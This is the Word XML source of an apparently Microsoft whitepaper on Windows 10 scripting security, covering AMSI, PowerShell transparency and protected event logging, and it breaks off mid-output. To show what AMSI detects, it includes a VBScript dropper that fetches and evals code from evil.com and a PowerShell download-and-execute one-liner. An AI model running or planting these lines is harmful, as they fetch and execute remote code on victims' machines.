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7A" w:rsidRDefault="0007502C" w:rsidP="00011489">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Advances in </w:t>
      </w:r>
      <w:r w:rsidR="00011489">
        <w:t>Scripting Security and Protection in Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F627CF" w:rsidRDefault="00F627CF" w:rsidP="00011489">
      <w:r>
        <w:t>Lee Holmes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F627CF" w:rsidRDefault="00F627CF" w:rsidP="00011489"/>
    <w:p w:rsidR="00A557BD" w:rsidRDefault="00A557BD" w:rsidP="00011489">
      <w:r>
        <w:t xml:space="preserve">At Microsoft, we invest an enormous amount of time and energy managing world-class cloud services and incredibly large enterprise networks. Security is </w:t>
      </w:r>
      <w:r w:rsidR="00D93456">
        <w:t xml:space="preserve">critical </w:t>
      </w:r>
      <w:r>
        <w:t>for all of these – so what might surprise you is that we also invest enormous amounts of time and energy trying to break into those services</w:t>
      </w:r>
      <w:r w:rsidR="007E28EE">
        <w:t xml:space="preserve">. This is called </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="007E28EE" w:rsidRPr="007E28EE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Red Teaming</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007E28EE">
        <w:t xml:space="preserve"> – taking highly specialized groups of security experts and having them adopt the role of sophisticated adversaries</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00011489" w:rsidRDefault="0002286A" w:rsidP="00011489">
      <w:r w:rsidRPr="0002286A">
        <w:t xml:space="preserve">In the last several releases of Windows, </w:t>
      </w:r>
      <w:r w:rsidR="00A557BD">
        <w:t xml:space="preserve">we’ve been </w:t>
      </w:r>
      <w:r w:rsidR="00CE7474">
        <w:t>working hard to make</w:t>
      </w:r>
      <w:r w:rsidRPr="0002286A">
        <w:t xml:space="preserve"> the platform much more </w:t>
      </w:r>
      <w:r w:rsidR="00A557BD">
        <w:t xml:space="preserve">powerful </w:t>
      </w:r>
      <w:r w:rsidRPr="0002286A">
        <w:t>for administrators, developers, and power users alike.</w:t>
      </w:r>
      <w:r w:rsidR="007958BD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0002286A">
        <w:t>The only problem is – the red teams are catching on.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0077166C" w:rsidRDefault="0079687F" w:rsidP="0079687F">
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>A Note about Assume Breach</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0079687F">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>In this document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>, the assumption is that an attacker has already compromised (breached) a system through a malicious phishing email, security flaw in a custom website implementation, or similar</w:t>
      </w:r>
      <w:r w:rsidR="0007502C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079687F" w:rsidRPr="0079687F" w:rsidRDefault="0077166C" w:rsidP="0079687F">
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">When these security flaws are in software, they are found and patched. But we always assume </w:t>
      </w:r>
      <w:r w:rsidR="005F54E9">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">the attackers will find </w:t>
      </w:r>
      <w:r w:rsidR="00B91184">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>some way to get in – even if only through a user being tricked into installing a malicious application on their computer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002286A" w:rsidRDefault="00A557BD" w:rsidP="00011489">
      <w:r>
        <w:t>As with any occupation, job satisfaction for attackers (</w:t>
      </w:r>
      <w:r w:rsidR="00BA5924">
        <w:t xml:space="preserve">either </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">funded by </w:t>
      </w:r>
      <w:r w:rsidR="00BA5924">
        <w:t xml:space="preserve">the company under attack or otherwise) plays an important role in </w:t>
      </w:r>
      <w:r w:rsidR="008D1764">
        <w:t xml:space="preserve">influencing attacker behaviour. After all, who wants to </w:t>
      </w:r>
      <w:r w:rsidR="00CE42B9">
        <w:t xml:space="preserve">extend their </w:t>
      </w:r>
      <w:r w:rsidR="008D1764">
        <w:t xml:space="preserve">compromise </w:t>
      </w:r>
      <w:r w:rsidR="00CE42B9">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="008D1764">
        <w:t xml:space="preserve">a system using </w:t>
      </w:r>
      <w:r w:rsidR="00CE42B9">
        <w:t xml:space="preserve">error prone and </w:t>
      </w:r>
      <w:r w:rsidR="008D1764">
        <w:t xml:space="preserve">hard-to-write C++ programs, when you </w:t>
      </w:r>
      <w:r w:rsidR="00CE42B9">
        <w:t>can accomplish the same thing with an elegant and powerful scripting language like PowerShell?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D441EB" w:rsidRDefault="00D441EB" w:rsidP="00011489">
      <w:r>
        <w:t xml:space="preserve">In this document, we’ll discuss </w:t>
      </w:r>
      <w:r w:rsidR="009B59A3">
        <w:t>some important advances we’ve made in scripting security and protection in Windows 10.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008348DB" w:rsidRDefault="008348DB" w:rsidP="00890596">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Scripting transparency for Antimalware engines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890596" w:rsidRDefault="004A5EDB" w:rsidP="00890596">
      <w:r>
        <w:t xml:space="preserve">Antimalware engines traditionally focus the majority of their attention on files </w:t>
      </w:r>
      <w:r w:rsidR="00B7752C">
        <w:t>that applications (or the system) open</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004F6AFF">
        <w:t xml:space="preserve"> A new Windows 10 feature, the Antimalware Scan Interface (AMSI), lets applications now become active participants in malware defense. Applications can now request antimalware evaluation of any content – not just files on disk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008348DB" w:rsidRDefault="00E250B0" w:rsidP="00890596">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">PowerShell </w:t>
      </w:r>
      <w:r w:rsidRPr="008275ED">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>♥</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the Blue Team</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890596" w:rsidRDefault="0026344D" w:rsidP="00890596">
      <w:r>
        <w:t xml:space="preserve">Given the incredible power of PowerShell’s shell and scripting language, we’ve made major advancements in PowerShell’s transparency: robust over-the-shoulder transcription, deep script block logging, encryption and decryption cmdlets using the Cryptographic Message Syntax (CMS) standard, </w:t>
      </w:r>
      <w:r w:rsidR="00930FCF">
        <w:t xml:space="preserve">secure code generation APIs for developers, and </w:t>
      </w:r>
      <w:r w:rsidR="00A86B5E">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00D0736A">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00A86B5E">
        <w:t xml:space="preserve">onstrained PowerShell” for systems that </w:t>
      </w:r>
      <w:r w:rsidR="00985EA2">
        <w:t>implement</w:t>
      </w:r>
      <w:r w:rsidR="002900FD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00720D73">
        <w:t>AppLocker</w:t>
      </w:r>
      <w:r w:rsidR="008F429C">
        <w:t xml:space="preserve"> policies</w:t>
      </w:r>
      <w:r w:rsidR="000D7777">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008348DB" w:rsidRDefault="008348DB" w:rsidP="00890596">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Protected Event Logging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890596" w:rsidRDefault="003A6D91" w:rsidP="00890596">
      <w:r>
        <w:t xml:space="preserve">One concern </w:t>
      </w:r>
      <w:r w:rsidR="00EE1496">
        <w:t xml:space="preserve">when you increase logging on a machine is that the information you’ve logged may contain sensitive data. If an attacker compromises that machine, this sensitive information in the event log may be a gold mine of credentials, confidential systems, and more. </w:t>
      </w:r>
      <w:r w:rsidR="00555A3C">
        <w:t xml:space="preserve">To help address this concern, we’ve added Protected Event Logging, which lets participating applications encrypt sensitive data as they write it to the event log. You can then decrypt </w:t>
      </w:r>
      <w:r w:rsidR="003F5218">
        <w:t xml:space="preserve">and process </w:t>
      </w:r>
      <w:r w:rsidR="00555A3C">
        <w:t xml:space="preserve">these logs once you’ve </w:t>
      </w:r>
      <w:r w:rsidR="004C2CAF">
        <w:t xml:space="preserve">moved them to </w:t>
      </w:r>
      <w:r w:rsidR="00555A3C">
        <w:t xml:space="preserve">a more secure </w:t>
      </w:r>
      <w:r w:rsidR="00E5071E">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00555A3C">
        <w:t xml:space="preserve">centralized </w:t>
      </w:r>
      <w:r w:rsidR="00E5071E">
        <w:t xml:space="preserve">log </w:t>
      </w:r>
      <w:r w:rsidR="00555A3C">
        <w:t>collector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA4946" w:rsidRDefault="00C51F51" w:rsidP="00C51F51">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scripting </w:t>
      </w:r>
      <w:r w:rsidR="004E389D">
        <w:t>Transparency for Antimalware Engines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004467C0" w:rsidRDefault="004467C0" w:rsidP="004467C0">
      <w:r>
        <w:t>In Windows 10, the Antimalware, Security and Identity, PowerShell, VBScript, and JScript teams have collaborated to allow applications to become active participants in malware defense. To do this, we're introducing a brand new way to help protect customers from dynamic script-based malware and non-traditional avenues of attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E389D" w:rsidRDefault="004467C0" w:rsidP="004467C0">
      <w:r>
        <w:t>This is called AMSI -- the Antimalware Scan Interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004467C0" w:rsidRDefault="00924EF7" w:rsidP="004467C0">
      <w:r>
        <w:t xml:space="preserve">Antivirus engines traditionally focus the majority of their attention on files being opened by </w:t>
      </w:r>
      <w:r w:rsidR="00755E83">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> system.</w:t>
      </w:r>
      <w:r w:rsidR="0062595E">
        <w:t xml:space="preserve"> When a file is opened, they scan its content, and make a decision as to its malicious intent. </w:t>
      </w:r>
      <w:r w:rsidR="00124B34">
        <w:t>This decision comes from running signatures against the file content – signatures that try to identify patterns of malicious intent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00124B34" w:rsidRDefault="002C60FF" w:rsidP="004467C0">
      <w:r>
        <w:t xml:space="preserve">A unique challenge when it comes to scripting languages is that they support the evaluation and invocation of dynamic script content. </w:t>
      </w:r>
      <w:r w:rsidR="00C22B02">
        <w:t>While</w:t>
      </w:r>
      <w:r w:rsidR="00270E11">
        <w:t xml:space="preserve"> a file itself may not be malicious</w:t>
      </w:r>
      <w:r w:rsidR="00C22B02">
        <w:t xml:space="preserve">, it might </w:t>
      </w:r>
      <w:r w:rsidR="00270E11">
        <w:t>pull malicious code from the internet.</w:t>
      </w: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6400"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">' Visual Basic "dropper" - Invoke arbitrary web </w:t>
      </w:r>
      <w:r w:rsidR="00B17286">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="006400"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="006400"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">ontent </w:t>
      </w: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url = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>"http://evil.com/content=N7fBTfrP"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> xmlhttp = CreateObject(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>"MSXML2.ServerXMLHTTP"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w: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xmlhttp.open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>"GET"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">, url, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00270E11" w:rsidRDefault="00270E11" w:rsidP="00270E1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xmlhttp.send </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00270E11" w:rsidRDefault="00270E11" w:rsidP="00270E11">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>eval(xmlhttp.responseText)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00270E11" w:rsidRDefault="00371983" w:rsidP="004467C0">
      <w:r>
        <w:t xml:space="preserve">In this example, the ‘eval’ statement </w:t>
      </w:r>
      <w:r w:rsidR="00787240">
        <w:t xml:space="preserve">(a language feature built into VBScript) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">takes the raw response from evil.com and invokes it as though it were VBScript. Since the internet content is not file-based, it is hidden from </w:t>
      </w:r>
      <w:r w:rsidR="00B17286">
        <w:t xml:space="preserve">inspection by </w:t>
      </w:r>
      <w:r>
        <w:t>traditional antivirus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B17286" w:rsidRDefault="00A1348E" w:rsidP="004467C0">
      <w:r>
        <w:t>Another unique twist to this challenge is the invocation of interactive content.</w:t>
      </w:r>
      <w:r w:rsidR="00974F7F">
        <w:t xml:space="preserve"> Interactive shells with a sufficiently powerful scripting language </w:t>
      </w:r>
      <w:r w:rsidR="00C22B02">
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="00974F7F">
        <w:t>cause a challenge because their input is not file-based at all:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B36D19" w:rsidRDefault="00B36D19" w:rsidP="00B36D19">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PS C:\&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Invoke-Expression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C22B02" w:rsidRPr="00C22B02" w:rsidRDefault="00B36D19" w:rsidP="00C22B02">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New-Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Net.WebClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DownloadString(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"http://bit.ly/e0Mw9w"</w:t>
      </w:r>
      <w:r w:rsidR="00C22B02">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F40991" w:rsidRDefault="00C640B1" w:rsidP="004467C0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F40991">
        <w:t>In this example, we’ve got a command that the user has typed at (or pasted into) the command line. PowerShell’s ‘</w:t>
      </w:r>
      <w:r w:rsidR="00F40991" w:rsidRPr="00E940D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Invoke-Expression</w:t>
      </w:r>
      <w:r w:rsidR="00F40991">
        <w:t xml:space="preserve">’ cmdlet </w:t>
      </w:r>
      <w:r w:rsidR="009A0568">
        <w:t xml:space="preserve">took </w:t>
      </w:r>
      <w:r w:rsidR="00F40991">
        <w:t>a raw response from an internet site and invoke</w:t>
      </w:r>
      <w:r w:rsidR="005F7E34">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00F40991">
        <w:t xml:space="preserve"> it as though it were PowerShell. Since neither the command </w:t>
      </w:r>
      <w:r w:rsidR="00974747">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00F40991">
        <w:t xml:space="preserve">or the internet content that it downloaded were file based, it </w:t>
      </w:r>
      <w:r w:rsidR="002B2F9A">
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidR="00F40991">
        <w:t>also hidden from inspection by traditional antivirus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B36D19" w:rsidRDefault="00C640B1" w:rsidP="004467C0">
      <w:r>
        <w:t xml:space="preserve">In Windows 10, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00326C6B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Antimalware Scan Interface</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A5DC8">
        <w:t xml:space="preserve">helps </w:t>
      </w:r>
      <w:r w:rsidR="00513723">
        <w:t>address</w:t>
      </w:r>
      <w:r w:rsidR="00442205">
        <w:t xml:space="preserve"> this concern.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442205" w:rsidRDefault="00C7086F" w:rsidP="004467C0">
      <w:r w:rsidRPr="00C7086F">
        <w:t xml:space="preserve">The Antimalware Scan Interface (AMSI) is a generic interface standard that allows applications and services to integrate with any antimalware product present on a machine. </w:t>
      </w:r>
      <w:r w:rsidR="00000AC7">
        <w:t>They can request an Antimalware analysis of any content that may be malicious and take action based on the response.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB4167" w:rsidRPr="004E389D" w:rsidRDefault="00BB4167" w:rsidP="004467C0">
      <w:r>
        <w:t>In Windows 10, the in-box scripting engines (PowerShell, VBScript, and J</w:t>
      </w:r>
      <w:r w:rsidR="001E1DF8">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>cript) now request an Antimalware analysis of all dynamic content – including content typed by hand at the command line, and content downloaded from remote sources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C51F51" w:rsidRDefault="001B7BE1" w:rsidP="00C51F51">
      <w:r>
        <w:t xml:space="preserve">With this support, detection </w:t>
      </w:r>
      <w:r w:rsidR="00820948">
        <w:t>within</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> obfuscated malware is now possible without Antimalware vendors having to write error-prone emulation of the scripting languages themselves:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B7BE1" w:rsidRDefault="001B7BE1" w:rsidP="001B7BE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6400"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>' Visual Basic "obfuscation" of the EICAR standard test file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B7BE1" w:rsidRDefault="001B7BE1" w:rsidP="001B7BE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eicar = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>"X5O!P%@AP[4\PZX54(P^)7CC)7}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> + _</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B7BE1" w:rsidRDefault="001B7BE1" w:rsidP="001B7BE1">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0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>"$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B7BE1" w:rsidRDefault="001B7BE1" w:rsidP="001B7BE1">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>eval(eicar)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B7BE1" w:rsidRDefault="001B7BE1" w:rsidP="001B7BE1">
      <w:r>
        <w:t>Now gives:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D979F1" w:rsidRPr="00D979F1" w:rsidRDefault="00D979F1" w:rsidP="00D979F1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D979F1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PS C:\temp&gt; .\eicar_test.vbs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D979F1" w:rsidRPr="00D979F1" w:rsidRDefault="00D979F1" w:rsidP="00D979F1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D979F1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Microsoft (R) Windows Script Host Version 5.12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D979F1" w:rsidRPr="00D979F1" w:rsidRDefault="00D979F1" w:rsidP="00D979F1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
